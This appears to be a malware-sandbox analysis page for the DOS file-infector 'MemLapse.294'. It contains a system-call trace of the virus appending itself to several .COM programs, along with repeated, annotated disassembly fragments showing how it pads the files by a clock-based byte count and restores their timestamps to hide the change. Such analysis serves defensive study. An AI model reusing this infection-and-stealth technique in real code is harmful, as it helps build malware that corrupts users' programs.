Sample viewer

vx.netlux.org/Virus.DOS.MemLapse.294


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:59:20.20129851Z 26 PC: 12d86 | Set disk transfer address
2018-12-17T21:59:20.202660469Z 78 PC: 12d8f | Find first file
2018-12-17T21:59:20.208100488Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.209191506Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.212208705Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.213715605Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.229612163Z 61 PC: 12dd1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:59:20.236755372Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.24420457Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.245502621Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.246801326Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.250101855Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.251432849Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.259024194Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
; Disassembly window logged at the return address of the first "Get time" call
; (the trace line above holds 0x12e2d: mov cl, dl). It derives a clock-based byte
; count, writes that many bytes to the open file, re-applies a file date/time and closes it.
0x12e2f: mov al, cl                 ; AL = CL; both copies are overwritten below (AL at 0x12e31, CL at 0x12e36)
0x12e31: mov ax, 0x2c00             ; AH=2Ch: DOS Get System Time (DL returns hundredths of a second)
0x12e34: int 0x21                   ; second clock read; the trace logs it with PC 12e36, the return address
0x12e36: mov cl, dl                 ; CL = hundredths from the second read
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
2018-12-17T21:59:20.262166695Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
; Disassembly window logged at the return address of the second "Get time" call
; (the trace line above holds 0x12e36: mov cl, dl, i.e. CL = hundredths of a second).
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
0x12e5c: mov dx, 0x80               ; DS:0080h, the default DTA location in the PSP
0x12e5f: int 0x21                   ; the trace logs this call once, at PC 12e61, after the last Find next file
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]          ; stack word -> DS:0102h; presumably restores host bytes near the 0100h entry (confirm)
2018-12-17T21:59:20.264481577Z 64 PC: 12e44 | Write file or device (Write 32 bytes on handle 5)
2018-12-17T21:59:20.267393289Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.269831275Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.280490381Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.283318188Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.285558937Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.288273029Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.289302517Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.29177788Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.293576604Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.304055414Z 61 PC: 12dd1 | Open file (Filename = 'PRINT.COM')
2018-12-17T21:59:20.308586475Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.312966548Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.313989057Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.315435682Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.318215163Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.319537304Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.322053006Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
; Disassembly window logged at the return address of the first "Get time" call
; (the trace line above holds 0x12e2d: mov cl, dl). It derives a clock-based byte
; count, writes that many bytes to the open file, re-applies a file date/time and closes it.
0x12e2f: mov al, cl                 ; AL = CL; both copies are overwritten below (AL at 0x12e31, CL at 0x12e36)
0x12e31: mov ax, 0x2c00             ; AH=2Ch: DOS Get System Time (DL returns hundredths of a second)
0x12e34: int 0x21                   ; second clock read; the trace logs it with PC 12e36, the return address
0x12e36: mov cl, dl                 ; CL = hundredths from the second read
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
2018-12-17T21:59:20.325211281Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
; Disassembly window logged at the return address of the second "Get time" call
; (the trace line above holds 0x12e36: mov cl, dl, i.e. CL = hundredths of a second).
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
0x12e5c: mov dx, 0x80               ; DS:0080h, the default DTA location in the PSP
0x12e5f: int 0x21                   ; the trace logs this call once, at PC 12e61, after the last Find next file
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]          ; stack word -> DS:0102h; presumably restores host bytes near the 0100h entry (confirm)
2018-12-17T21:59:20.32780499Z 64 PC: 12e44 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T21:59:20.330353423Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.33250472Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.339699018Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.341417394Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.343232261Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.345659727Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.346666343Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.357726257Z 61 PC: 12dd1 | Open file (Filename = 'HELLO.COM')
2018-12-17T21:59:20.364648526Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.371535533Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.373481441Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.375124904Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.377032186Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.378648205Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.380607216Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
; Disassembly window logged at the return address of the first "Get time" call
; (the trace line above holds 0x12e2d: mov cl, dl). It derives a clock-based byte
; count, writes that many bytes to the open file, re-applies a file date/time and closes it.
0x12e2f: mov al, cl                 ; AL = CL; both copies are overwritten below (AL at 0x12e31, CL at 0x12e36)
0x12e31: mov ax, 0x2c00             ; AH=2Ch: DOS Get System Time (DL returns hundredths of a second)
0x12e34: int 0x21                   ; second clock read; the trace logs it with PC 12e36, the return address
0x12e36: mov cl, dl                 ; CL = hundredths from the second read
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
2018-12-17T21:59:20.382206511Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
; Disassembly window logged at the return address of the second "Get time" call
; (the trace line above holds 0x12e36: mov cl, dl, i.e. CL = hundredths of a second).
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
0x12e5c: mov dx, 0x80               ; DS:0080h, the default DTA location in the PSP
0x12e5f: int 0x21                   ; the trace logs this call once, at PC 12e61, after the last Find next file
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]          ; stack word -> DS:0102h; presumably restores host bytes near the 0100h entry (confirm)
2018-12-17T21:59:20.384293534Z 64 PC: 12e44 | Write file or device (Write 165 bytes on handle 5)
2018-12-17T21:59:20.389492198Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.390911307Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.398862442Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.401353338Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.402360684Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.404824018Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.406119512Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.415724293Z 61 PC: 12dd1 | Open file (Filename = 'PHANG.COM')
2018-12-17T21:59:20.422604407Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.429796259Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.431048254Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.432193207Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.434763802Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.435945379Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.4383395Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
; Disassembly window logged at the return address of the first "Get time" call
; (the trace line above holds 0x12e2d: mov cl, dl). It derives a clock-based byte
; count, writes that many bytes to the open file, re-applies a file date/time and closes it.
0x12e2f: mov al, cl                 ; AL = CL; both copies are overwritten below (AL at 0x12e31, CL at 0x12e36)
0x12e31: mov ax, 0x2c00             ; AH=2Ch: DOS Get System Time (DL returns hundredths of a second)
0x12e34: int 0x21                   ; second clock read; the trace logs it with PC 12e36, the return address
0x12e36: mov cl, dl                 ; CL = hundredths from the second read
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
2018-12-17T21:59:20.441455132Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
; Disassembly window logged at the return address of the second "Get time" call
; (the trace line above holds 0x12e36: mov cl, dl, i.e. CL = hundredths of a second).
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
0x12e5c: mov dx, 0x80               ; DS:0080h, the default DTA location in the PSP
0x12e5f: int 0x21                   ; the trace logs this call once, at PC 12e61, after the last Find next file
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]          ; stack word -> DS:0102h; presumably restores host bytes near the 0100h entry (confirm)
2018-12-17T21:59:20.443356508Z 64 PC: 12e44 | Write file or device (Write 168 bytes on handle 5)
2018-12-17T21:59:20.445825949Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.447903226Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.4551086Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.457327242Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.45869909Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.461204638Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.462543684Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.465407944Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.466578549Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.476053154Z 61 PC: 12dd1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T21:59:20.483200912Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.487274294Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.488360943Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.489917464Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.491784297Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.492856305Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.495477813Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
; Disassembly window logged at the return address of the first "Get time" call
; (the trace line above holds 0x12e2d: mov cl, dl). It derives a clock-based byte
; count, writes that many bytes to the open file, re-applies a file date/time and closes it.
0x12e2f: mov al, cl                 ; AL = CL; both copies are overwritten below (AL at 0x12e31, CL at 0x12e36)
0x12e31: mov ax, 0x2c00             ; AH=2Ch: DOS Get System Time (DL returns hundredths of a second)
0x12e34: int 0x21                   ; second clock read; the trace logs it with PC 12e36, the return address
0x12e36: mov cl, dl                 ; CL = hundredths from the second read
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
2018-12-17T21:59:20.496924294Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
; Disassembly window logged at the return address of the second "Get time" call
; (the trace line above holds 0x12e36: mov cl, dl, i.e. CL = hundredths of a second).
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
0x12e5c: mov dx, 0x80               ; DS:0080h, the default DTA location in the PSP
0x12e5f: int 0x21                   ; the trace logs this call once, at PC 12e61, after the last Find next file
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]          ; stack word -> DS:0102h; presumably restores host bytes near the 0100h entry (confirm)
2018-12-17T21:59:20.499083968Z 64 PC: 12e44 | Write file or device (Write 168 bytes on handle 5)
2018-12-17T21:59:20.50303598Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.504737934Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.512294211Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.515346937Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.516673056Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.527276832Z 61 PC: 12dd1 | Open file (Filename = 'MANDEL.COM')
2018-12-17T21:59:20.534663869Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.541134032Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.542343131Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.544151257Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.5468547Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.548247194Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.756484026Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
; Disassembly window logged at the return address of the first "Get time" call
; (the trace line above holds 0x12e2d: mov cl, dl). It derives a clock-based byte
; count, writes that many bytes to the open file, re-applies a file date/time and closes it.
0x12e2f: mov al, cl                 ; AL = CL; both copies are overwritten below (AL at 0x12e31, CL at 0x12e36)
0x12e31: mov ax, 0x2c00             ; AH=2Ch: DOS Get System Time (DL returns hundredths of a second)
0x12e34: int 0x21                   ; second clock read; the trace logs it with PC 12e36, the return address
0x12e36: mov cl, dl                 ; CL = hundredths from the second read
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
2018-12-17T21:59:20.759038369Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
; Disassembly window logged at the return address of the second "Get time" call
; (the trace line above holds 0x12e36: mov cl, dl, i.e. CL = hundredths of a second).
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
0x12e5c: mov dx, 0x80               ; DS:0080h, the default DTA location in the PSP
0x12e5f: int 0x21                   ; the trace logs this call once, at PC 12e61, after the last Find next file
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]          ; stack word -> DS:0102h; presumably restores host bytes near the 0100h entry (confirm)
2018-12-17T21:59:20.761566998Z 64 PC: 12e44 | Write file or device (Write 43 bytes on handle 5)
2018-12-17T21:59:20.765357897Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.767483375Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.882630819Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.885802652Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.886858783Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.896801206Z 61 PC: 12dd1 | Open file (Filename = 'PAH.COM')
2018-12-17T21:59:20.904136811Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.911172552Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.912853963Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.914829465Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.917318712Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.918588325Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
